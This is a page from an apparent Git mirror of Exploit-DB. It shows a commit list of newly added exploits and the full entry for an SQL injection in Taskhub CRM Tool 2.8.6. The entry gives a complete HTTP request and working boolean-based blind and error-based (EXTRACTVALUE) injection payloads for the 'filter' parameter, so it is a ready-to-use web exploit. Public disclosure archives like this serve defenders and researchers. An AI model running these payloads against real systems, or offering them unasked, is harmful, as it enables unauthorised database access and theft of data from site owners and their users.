bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51692.txt
Exploit-DB e07f33f24d DB: 2023-08-22 
17 changes to exploits/shellcodes/ghdb

EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)
EuroTel ETL3100 - Transmitter Default Credentials
EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download

Color Prediction Game v1.0 - SQL Injection

Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

Dolibarr Version 17.0.1 - Stored XSS

Global - Multi School Management System Express v1.0- SQL Injection

OVOO Movie Portal CMS v3.3.3 - SQL Injection

PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities

Taskhub CRM Tool 2.8.6 - SQL Injection

Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions
TSPlus 16.0.0.0 - Remote Work Insecure Credential storage
TSplus 16.0.0.0 - Remote Work Insecure Files and Folders
TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions

Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
2023-08-22 00:16:22 +00:00

37 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Tested on: Kali Linux & MacOS
# CVE: N/A
### Request ###
GET /projects?filter=notstarted HTTP/1.1
Host: localhost
Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;
ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
### Parameter & Payloads ###
Parameter: filter (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)
Payload: filter=notstarted' AND
EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT
(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ
Reference in a new issue View git blame Copy permalink